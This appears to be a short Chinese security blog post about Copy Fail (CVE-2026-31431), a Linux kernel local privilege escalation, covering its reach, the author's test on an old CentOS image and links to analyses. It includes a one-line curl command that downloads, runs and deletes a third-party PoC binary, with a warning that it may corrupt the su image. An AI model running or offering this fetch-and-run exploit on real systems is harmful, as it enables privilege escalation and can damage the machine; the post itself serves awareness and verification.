Copy Fail(CVE-2026-31431):732字节脚本提权linux

· 2026-05-01 13:37 · 4 阅读

网安杂谈 2026-05-01 13:37 山东

近期披露的Linux内核高危本地提权漏洞(Copy Fail,CVE-2026-31431)由 Xint Code 团队发现,源于一处隐蔽且易触发的内核逻辑缺陷。攻击者在具备本地访问条件下,可稳定实现权限提升并获取系统最高权限。

该漏洞利用代码(PoC)已公开,显著降低攻击门槛。其影响可追溯至 2017 年,覆盖主流 Linux 发行版,并波及云服务器、容器宿主机、多租户环境以及各类基于 Linux 的嵌入式设备(如物联网终端、工控设备和网络设备),整体风险范围广、危害等级高。

利用demo视频来自Copy Fail (CVE-2026-31431) 官网

看资料觉得该漏洞的利用相当简单,于是翻出一个陈年centos镜像(3.10.0-1160.66.1.el7.x86_64)仿真起来试了试,竟然不受影响(版本太老了)!后面再找个嵌入式设备的镜像试一试。

人工验真!Linux提权漏洞,影响这么多信创!(附稳定验证PoC)

微步给的验证POC注意禁止线上环境进行验证验证程序可能会损坏系统su命令内存映像

curl -fsSL https://onesandbox-release.threatbook.cn/poc/CVE-2026-31431/copyfail -o /tmp/copyfail && chmod +x /tmp/copyfail && /tmp/copyfail && rm -f /tmp/copyfail

在某些取证场景下,确实还挺有用的。

那么如何发现该漏洞利用的痕迹呢?参考安天科技的分析:

CVE-2026-31431(Copy Fail)漏洞FAQ(上)——漏洞的基本情况、影响范围与处置篇

CVE-2026-31431(Copy Fail)漏洞FAQ(下)——漏洞技术机理、历史坐标与战略启示篇

自动化利用工具肯定也已经出来了,大家做好防护,五一劳动节快乐!

跳转微信打开